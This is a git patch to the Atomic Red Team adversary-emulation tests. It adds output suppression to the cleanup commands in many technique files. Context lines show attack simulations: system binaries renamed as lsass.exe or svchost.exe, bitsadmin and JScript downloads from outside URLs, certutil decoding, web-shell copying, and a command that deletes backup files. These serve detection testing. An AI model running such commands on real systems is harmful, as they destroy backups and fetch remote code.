From 3fa4dd1c9e28a3fdbfdd570235cabffa4f85ea64 Mon Sep 17 00:00:00 2001 From: JrOrOneEquals1 <49999278+JrOrOneEquals1@users.noreply.github.com> Date: Tue, 10 Mar 2020 17:06:14 -0600 Subject: [PATCH] Fixed cleanup commands (#869) Co-authored-by: Carrie Roberts --- atomics/T1036/T1036.yaml | 12 ++++++------ atomics/T1038/T1038.yaml | 4 ++-- atomics/T1055/T1055.yaml | 4 ++-- atomics/T1064/T1064.yaml | 2 +- atomics/T1071/T1071.yaml | 2 +- atomics/T1100/T1100.yaml | 2 +- atomics/T1102/T1102.yaml | 2 +- atomics/T1105/T1105.yaml | 4 ++-- atomics/T1107/T1107.yaml | 2 +- atomics/T1114/T1114.yaml | 2 +- atomics/T1115/T1115.yaml | 2 +- atomics/T1119/T1119.yaml | 8 ++++---- atomics/T1121/T1121.yaml | 6 +++--- atomics/T1140/T1140.yaml | 8 ++++---- atomics/T1145/T1145.yaml | 2 +- atomics/T1158/T1158.yaml | 6 +++--- atomics/T1197/T1197.yaml | 2 +- atomics/T1485/T1485.yaml | 2 +- atomics/T1500/T1500.yaml | 2 +- 19 files changed, 37 insertions(+), 37 deletions(-) diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml index 1900e80e0d..c7f0fb5a84 100644 --- a/atomics/T1036/T1036.yaml +++ b/atomics/T1036/T1036.yaml @@ -17,7 +17,7 @@ atomic_tests: cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe cmd.exe /c %SystemRoot%\Temp\lsass.exe cleanup_command: | - del /Q /F %SystemRoot%\Temp\lsass.exe + del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - name: Masquerading as Linux crond process. description: | @@ -47,7 +47,7 @@ atomic_tests: copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: | - del /Q /F %APPDATA%\notepad.exe + del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - name: Masquerading - wscript.exe running as svchost.exe description: | @@ -63,7 +63,7 @@ atomic_tests: copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: | - del /Q /F %APPDATA%\svchost.exe + del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - name: Masquerading - powershell.exe running as taskhostw.exe description: | @@ -79,7 +79,7 @@ atomic_tests: copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: | - del /Q /F %APPDATA%\taskhostw.exe + del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - name: Masquerading - non-windows exe running as windows exe description: | @@ -159,5 +159,5 @@ atomic_tests: copy C:\Windows\System32\cmd.exe C:\lsm.exe C:\lsm.exe /c echo T1036 > C:\T1036.txt cleanup_command: | - del C:\T1036.txt - del C:\lsm.exe + del C:\T1036.txt >nul 2>&1 + del C:\lsm.exe >nul 2>&1 diff --git a/atomics/T1038/T1038.yaml b/atomics/T1038/T1038.yaml index 2b706b058a..6e7e7960f9 100644 --- a/atomics/T1038/T1038.yaml +++ b/atomics/T1038/T1038.yaml @@ -18,5 +18,5 @@ atomic_tests: copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll %APPDATA%\updater.exe -Command exit cleanup_command: | - del %APPDATA%\updater.exe - del %APPDATA%\amsi.dll + del %APPDATA%\updater.exe >nul 2>&1 + del %APPDATA%\amsi.dll >nul 2>&1 diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 5506b536b1..4bdac8c969 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -130,6 +130,6 @@ atomic_tests: copy C:\Windows\System32\cmd.exe C:\svchost.exe C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt cleanup_command: | - del C:\T1055.txt - del C:\svchost.exe + del C:\T1055.txt >nul 2>&1 + del C:\svchost.exe >nul 2>&1 diff --git a/atomics/T1064/T1064.yaml b/atomics/T1064/T1064.yaml index a4b89a47f2..93ee5c055e 100644 --- a/atomics/T1064/T1064.yaml +++ b/atomics/T1064/T1064.yaml @@ -44,4 +44,4 @@ atomic_tests: C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create} C:\Windows\system32\cmd.exe /Q /c #{script_to_create} cleanup_command: | - del #{script_to_create} + del #{script_to_create} >nul 2>&1 diff --git a/atomics/T1071/T1071.yaml b/atomics/T1071/T1071.yaml index 30194f62d1..ef612c4084 100644 --- a/atomics/T1071/T1071.yaml +++ b/atomics/T1071/T1071.yaml @@ -210,4 +210,4 @@ atomic_tests: echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} cscript //E:Jscript #{script_file} cleanup_command: | - del #{script_file} /F /Q + del #{script_file} /F /Q >nul 2>&1 diff --git a/atomics/T1100/T1100.yaml b/atomics/T1100/T1100.yaml index afd4ce5d68..c730652d5a 100644 --- a/atomics/T1100/T1100.yaml +++ b/atomics/T1100/T1100.yaml @@ -37,4 +37,4 @@ atomic_tests: command: | xcopy #{web_shells} #{web_shell_path} cleanup_command: | - del #{web_shell_path} + del #{web_shell_path} >nul 2>&1 diff --git a/atomics/T1102/T1102.yaml b/atomics/T1102/T1102.yaml index 9ca998e0ec..e029ba49f5 100644 --- a/atomics/T1102/T1102.yaml +++ b/atomics/T1102/T1102.yaml @@ -14,7 +14,7 @@ atomic_tests: command: | bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html cleanup_command: | - del %TEMP%\bitsadmindownload.html + del %TEMP%\bitsadmindownload.html >nul 2>&1 - name: Reach out to C2 Pointer URLs via powershell diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index cbb7dccab2..fbe8ebf05b 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -276,7 +276,7 @@ atomic_tests: pushd #{destination_path} echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript - del AtomicTestT1105.js /Q - del AtomicTestFileT1105.js /Q + del AtomicTestT1105.js /Q >nul 2>&1 + del AtomicTestFileT1105.js /Q >nul 2>&1 popd \ No newline at end of file diff --git a/atomics/T1107/T1107.yaml b/atomics/T1107/T1107.yaml index 9e4a742f4b..70ec53da4a 100644 --- a/atomics/T1107/T1107.yaml +++ b/atomics/T1107/T1107.yaml @@ -60,7 +60,7 @@ atomic_tests: elevation_required: false command: | echo "T1107" > %temp%\T1107.txt - del /f %temp%\T1107.txt + del /f %temp%\T1107.txt >nul 2>&1 - name: Delete an entire folder - Windows cmd description: | diff --git a/atomics/T1114/T1114.yaml b/atomics/T1114/T1114.yaml index d9bdd267b9..0e30478ddb 100644 --- a/atomics/T1114/T1114.yaml +++ b/atomics/T1114/T1114.yaml @@ -22,4 +22,4 @@ atomic_tests: command: | powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file} cleanup_command: | - del #{output_file} + del #{output_file} >nul 2>&1 diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index c7e24d13d9..22e59ce08b 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -17,7 +17,7 @@ atomic_tests: echo "T1115" > %temp%\T1115.txt clip < %temp%\T1115.txt cleanup_command: | - del %temp%\T1115.txt + del %temp%\T1115.txt >nul 2>&1 - name: PowerShell description: | diff --git a/atomics/T1119/T1119.yaml b/atomics/T1119/T1119.yaml index c92b9cf8b7..5835817c41 100644 --- a/atomics/T1119/T1119.yaml +++ b/atomics/T1119/T1119.yaml @@ -60,7 +60,7 @@ atomic_tests: wmic process list > %TEMP%\T1119_3.txt tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt cleanup_command: | - del %TEMP%\T1119_1.txt >$null 2>&1 - del %TEMP%\T1119_2.txt >$null 2>&1 - del %TEMP%\T1119_3.txt >$null 2>&1 - del %TEMP%\T1119_4.txt >$null 2>&1 \ No newline at end of file + del %TEMP%\T1119_1.txt >nul 2>&1 + del %TEMP%\T1119_2.txt >nul 2>&1 + del %TEMP%\T1119_3.txt >nul 2>&1 + del %TEMP%\T1119_4.txt >nul 2>&1 \ No newline at end of file diff --git a/atomics/T1121/T1121.yaml b/atomics/T1121/T1121.yaml index 4435c8fd09..05f2ee4379 100644 --- a/atomics/T1121/T1121.yaml +++ b/atomics/T1121/T1121.yaml @@ -35,7 +35,7 @@ atomic_tests: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name} cleanup_command: | - del #{file_name} + del #{file_name} >nul 2>&1 - name: Regsvs Uninstall Method Call Test description: | @@ -72,5 +72,5 @@ atomic_tests: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name} cleanup_command: | - del #{file_name} >$null 2>&1 - del key.snk >$null 2>&1 \ No newline at end of file + del #{file_name} >nul 2>&1 + del key.snk >nul 2>&1 \ No newline at end of file diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml index f048094b5e..60c8d1c77f 100644 --- a/atomics/T1140/T1140.yaml +++ b/atomics/T1140/T1140.yaml @@ -20,8 +20,8 @@ atomic_tests: certutil -encode #{executable} %temp%\T1140_calc.txt certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe cleanup_command: | - del %temp%\T1140_calc.txt - del %temp%T1140_calc_decoded.exe + del %temp%\T1140_calc.txt >nul 2>&1 + del %temp%T1140_calc_decoded.exe >nul 2>&1 - name: Certutil Rename and Decode description: | @@ -40,5 +40,5 @@ atomic_tests: copy %windir%\system32\certutil.exe %temp%\tcm.tmp %temp%\tcm.tmp -decode #{executable} %temp%\T1140.txt cleanup_command: | - del %temp%\tcm.tmp - del %temp%\T1140.txt + del %temp%\tcm.tmp >nul 2>&1 + del %temp%\T1140.txt >nul 2>&1 diff --git a/atomics/T1145/T1145.yaml b/atomics/T1145/T1145.yaml index bd0106a397..437a15240e 100644 --- a/atomics/T1145/T1145.yaml +++ b/atomics/T1145/T1145.yaml @@ -16,7 +16,7 @@ atomic_tests: echo "ATOMICREDTEAM" > %windir%\cert.key dir c:\ /b /s .key | findstr /e .key cleanup_command: | - del c:\Windows\cert.key + del c:\Windows\cert.key >nul 2>&1 - name: Discover Private SSH Keys description: | diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml index d67cf4c55e..2607c314d1 100644 --- a/atomics/T1158/T1158.yaml +++ b/atomics/T1158/T1158.yaml @@ -41,7 +41,7 @@ atomic_tests: echo T1158 > %TEMP%\T1158.txt attrib.exe +s %TEMP%\T1158.txt cleanup_command: | - del /A:S %TEMP%\T1158.txt + del /A:S %TEMP%\T1158.txt >nul 2>&1 - name: Create Windows Hidden File with Attrib description: | @@ -55,7 +55,7 @@ atomic_tests: echo T1158_hidden > %TEMP%\T1158_hidden.txt attrib.exe +h %TEMP%\T1158_hidden.txt cleanup_command: | - del /A:H %TEMP%\T1158_hidden.txt + del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 - name: Hidden files description: | @@ -122,7 +122,7 @@ atomic_tests: echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: | - del #{file_name} + del #{file_name} >nul 2>&1 - name: Create ADS PowerShell description: | diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 74ab6fcb89..5dab057bc0 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -24,7 +24,7 @@ atomic_tests: command: | bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} cleanup_command: | - del #{local_file} + del #{local_file} >nul 2>&1 - name: Download & Execute via PowerShell BITS description: | diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index 235473a71a..8b1708b2d7 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -101,4 +101,4 @@ atomic_tests: name: command_prompt elevation_required: true command: | - del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk + del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1 diff --git a/atomics/T1500/T1500.yaml b/atomics/T1500/T1500.yaml index 43139ba75d..8475e4ed78 100644 --- a/atomics/T1500/T1500.yaml +++ b/atomics/T1500/T1500.yaml @@ -37,4 +37,4 @@ atomic_tests: command: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} cleanup_command: | - del #{output_file} \ No newline at end of file + del #{output_file} >nul 2>&1 \ No newline at end of file